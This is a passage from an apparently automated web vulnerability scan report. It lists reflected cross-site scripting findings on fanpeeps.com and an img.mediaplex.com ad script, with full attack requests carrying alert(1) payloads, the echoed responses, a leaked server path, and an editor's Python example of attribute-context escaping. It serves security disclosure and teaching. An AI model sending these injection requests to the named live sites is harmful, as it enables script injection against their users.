
Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 34019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=idol value=1562ed><script>alert(1)</script>c231ddca073>
...[SNIP]...

4.61. http://fanpeeps.com/ [iid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the iid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 47b75><script>alert(1)</script>00fe593e9e0 was submitted in the iid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=news&pid=18&iid=647b75><script>alert(1)</script>00fe593e9e0 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.2.10.1305373774

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 11:50:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=idol value=647b75><script>alert(1)</script>00fe593e9e0>
...[SNIP]...

4.62. http://fanpeeps.com/ [iid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the iid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce21d"><script>alert(1)</script>153bac35617 was submitted in the iid parameter. This input was echoed as ce21d\"><script>alert(1)</script>153bac35617 in the application's response. The backslash in front of the quote is SQL-style string escaping (consistent with PHP's addslashes() or magic_quotes_gpc on this PHP/5.2.5 host, although only the output is visible here); an HTML parser attaches no meaning to the backslash and still terminates the attribute at the double quote, so the escaping does not mitigate the issue.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=news&pid=18&iid=6ce21d"><script>alert(1)</script>153bac35617 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.2.10.1305373774

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 11:50:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<a href="/?pid=18&idol=6ce21d\"><script>alert(1)</script>153bac35617&action=tweets">
...[SNIP]...

4.63. http://fanpeeps.com/ [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload c375d><script>alert(1)</script>eb27e03bf16 was submitted in the pid parameter. This input was echoed unmodified in the application's response. The response also opens with a PHP warning from mysql_fetch_object() in /home/cerebel6/public_html/fan/loaddata.php, which discloses an absolute filesystem path and shows that the tampered pid value reaches a database query that then fails; pid is listed separately under the SQL injection findings in section 1.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=news&pid=18c375d><script>alert(1)</script>eb27e03bf16&iid=6 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.2.10.1305373774

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 11:50:06 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10397

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...
<a rel=nofollow href=/?action=home&pid=-1&zpid=18c375d><script>alert(1)</script>eb27e03bf16>
...[SNIP]...

4.64. http://fanpeeps.com/ [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6915e"><script>alert(1)</script>b9f4bf16f51 was submitted in the pid parameter. This input was echoed as 6915e\"><script>alert(1)</script>b9f4bf16f51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=news&pid=186915e"><script>alert(1)</script>b9f4bf16f51&iid=6 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.2.10.1305373774

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 11:50:06 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10421

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...
<a href="?pid=186915e\"><script>alert(1)</script>b9f4bf16f51">
...[SNIP]...

4.65. http://fanpeeps.com/ [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 37263'><script>alert(1)</script>1cd51c17292 was submitted in the pid parameter. This input was echoed as 37263\'><script>alert(1)</script>1cd51c17292 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=news&pid=1837263'><script>alert(1)</script>1cd51c17292&iid=6 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.2.10.1305373774

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 11:50:06 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10421

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...
<input type=hidden name=pid value='1837263\'><script>alert(1)</script>1cd51c17292'>
...[SNIP]...

4.66. http://fanpeeps.com/ [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96244"><script>alert(1)</script>b1b3330c6ce was submitted in the q parameter. This input was echoed unmodified in the application's response. Compared with 4.68, where the same hidden field is echoed as value=70654>..., the attribute in the template is actually unquoted: the leading double quote here is part of the original search string ("dancing with the stars") and, unlike the quotes in 4.62 and 4.64, it is echoed without a backslash.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pid=2&q="dancing96244"><script>alert(1)</script>b1b3330c6ce with the stars" OR DWTS HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:25 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=q value="dancing96244"><script>alert(1)</script>b1b3330c6ce>
...[SNIP]...

4.67. http://fanpeeps.com/ [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b7ad</script><script>alert(1)</script>6af48e25fcb was submitted in the q parameter. This input was echoed unmodified in the application's response. The string is single-quoted and the double quote from the search string is backslash-escaped, but the payload needs neither: the HTML parser recognises </script> before the JavaScript tokenizer ever runs, so the tag ends the script element from inside the string literal.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?pid=2&q="dancing3b7ad</script><script>alert(1)</script>6af48e25fcb with the stars" OR DWTS HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:37 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
</div>');
       
        return html.join('');
       };

       twitterlib.search(' AND \"dancing3b7ad</script><script>alert(1)</script>6af48e25fcb', { limit: 30, filter: '' }, function (tweets, options) {
       var html = [];
        for (var i = 0; i < tweets.length; i++) {
           html.push(twitterlib.render(tweets[i], first, i == 0));
           first = false;
       
...[SNIP]...

4.68. http://fanpeeps.com/ [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 70654><script>alert(1)</script>1785e056dba was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pid=2&q=70654><script>alert(1)</script>1785e056dba with the stars" OR DWTS HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:44:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=q value=70654><script>alert(1)</script>1785e056dba>
...[SNIP]...

4.69. http://fanpeeps.com/media/ [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e24a"><script>alert(1)</script>f5fa8790e72 was submitted in the pid parameter. This input was echoed as 3e24a\"><script>alert(1)</script>f5fa8790e72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/?pid=3e24a"><script>alert(1)</script>f5fa8790e72 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:43:50 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18100

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...
<a href="?pid=3e24a\"><script>alert(1)</script>f5fa8790e72">
...[SNIP]...

4.70. http://fanpeeps.com/media/ [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /media/

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b65e9><script>alert(1)</script>c8988a3d600 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/?pid=b65e9><script>alert(1)</script>c8988a3d600 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:43:51 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<a rel=nofollow href=/?action=home&pid=-1&zpid=b65e9><script>alert(1)</script>c8988a3d600>
...[SNIP]...
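
Worked example (added by the editor; it is not scan output and not code from fanpeeps.com). The three attribute contexts reported in 4.60 to 4.66 and 4.68 to 4.70 are modelled below with Python string templates that stand in for the site's PHP, rendered with the report's own payloads, and fed to the standard-library HTML parser to see whether a <script> element comes out. The templates are reconstructed from the echoed markup and are not the application's source, and the addslashes() stand-in is an assumption about what put the backslashes in front of the echoed quotes.

```python
"""Attribute-context XSS: unquoted, and backslash-"escaped" double/single quoted.

Editorial example, not code from fanpeeps.com or from the scan report. The
templates are reconstructed from the markup echoed in findings 4.60, 4.62
and 4.65; addslashes() is an assumption about the server-side escaping.
"""
import html
from html.parser import HTMLParser


def addslashes(value: str) -> str:
    """Stand-in for PHP addslashes()/magic_quotes_gpc (assumed). This is
    SQL-string escaping; an HTML parser attaches no meaning to the backslash."""
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"'))


def attr_encode(value: str) -> str:
    """Attribute-context encoding (PHP: htmlspecialchars($v, ENT_QUOTES, 'UTF-8')).
    Only sufficient when the attribute value is quoted."""
    return html.escape(value, quote=True)


# (label, payload taken from the report, template reconstructed from the response)
CASES = [
    ("4.60 unquoted attribute",
     "562ed><script>alert(1)</script>c231ddca073",
     lambda v: f"<input type=hidden name=idol value=1{v}>"),
    ("4.62 double-quoted attribute, addslashes()",
     'ce21d"><script>alert(1)</script>153bac35617',
     lambda v: f'<a href="/?pid=18&idol=6{addslashes(v)}&action=tweets">'),
    ("4.65 single-quoted attribute, addslashes()",
     "37263'><script>alert(1)</script>1cd51c17292",
     lambda v: f"<input type=hidden name=pid value='18{addslashes(v)}'>"),
    ("hardened: quoted attribute + attr_encode()",
     'ce21d"><script>alert(1)</script>153bac35617',
     lambda v: f'<input type="hidden" name="idol" value="{attr_encode(v)}">'),
]


class TagCollector(HTMLParser):
    """Collect start tags as a tolerant HTML parser produces them, which is
    what a browser does before any script can run."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def creates_script_element(markup: str) -> bool:
    """True if parsing the markup yields a <script> element."""
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return "script" in parser.tags


def check_cases() -> dict:
    """Map each case label to whether the payload escapes the attribute."""
    return {label: creates_script_element(template(payload))
            for label, payload, template in CASES}


if __name__ == "__main__":
    for label, escaped in check_cases().items():
        print(("XSS  " if escaped else "safe ") + label)
```

The unquoted case needs only a > to leave the attribute, and the quoted cases leave it at the first quote character regardless of the backslash in front of it; only the combination of a quoted attribute and HTML entity encoding of the value keeps the payload inside the attribute.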

4.71. http://img.mediaplex.com/content/0/13754/86576/FINS_phone_300x250.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_phone_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d6c1"%3balert(1)//a553d609cbe was submitted in the mpck parameter. This input was echoed as 4d6c1";alert(1)//a553d609cbe in the application's response. Two points to weigh before rating this: the response is a script resource (Content-Type: application/x-javascript), not an HTML document, so the injected code runs in the origin of whichever page includes the script with these parameters, and reaching the img.mediaplex.com origin itself requires a page on that origin that loads the script with attacker-controlled values; and the reflected value sits inside an HTML anchor that the script builds as a string (note the escaped target=\"_blank\" that follows it), so a correct fix needs HTML-attribute encoding before JavaScript-string encoding. The same applies to the mpvc parameter in 4.72.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_phone_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D30400104d6c1"%3balert(1)//a553d609cbe&mpt=3040010&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/a%3B207642206%3B1-0%3B0%3B29270204%3B4307-300/250%3B33472683/33490561/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bbiz%3D1053%3B%3B%3Bmc%3Db2pfreezone%3Btile%3D7%3Bsz%3D336x280%2C300x250%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/business_econ_front;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;ord=5370537053705370;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo3=13754:1281

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 10:13:10 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 20:44:51 GMT
ETag: "483399-b85-49b66d64a36c0"
Accept-Ranges: bytes
Content-Length: 6630
Content-Type: application/x-javascript


function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
;29270204;4307-300/250;33472683/33490561/1;;~okv=;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;;~aopt=6/1/ff/1;~sscs=?http://altfarm.mediaplex.com/ad/ck/13754-86576-1281-0?mpt=30400104d6c1";alert(1)//a553d609cbe\" target=\"_blank\">
...[SNIP]...

4.72. http://img.mediaplex.com/content/0/13754/86576/FINS_phone_300x250.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/13754/86576/FINS_phone_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe2e0"%3balert(1)//fbfb0034a22 was submitted in the mpvc parameter. This input was echoed as fe2e0";alert(1)//fbfb0034a22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/13754/86576/FINS_phone_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F13754-86576-1281-0%3Fmpt%3D3040010&mpt=3040010&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b07/3/0/%2a/a%3B207642206%3B1-0%3B0%3B29270204%3B4307-300/250%3B33472683/33490561/1%3B%3B%7Eokv%3D%3B%21category%3D%3Bbiz%3D1053%3B%3B%3Bmc%3Db2pfreezone%3Btile%3D7%3Bsz%3D336x280%2C300x250%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3ffe2e0"%3balert(1)//fbfb0034a22 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/bottom.interactive.wsj.com/business_econ_front;!category=;biz=1053;;;mc=b2pfreezone;tile=7;sz=336x280,300x250;ord=5370537053705370;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo3=13754:1281

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 10:13:39 GMT
Server: Apache
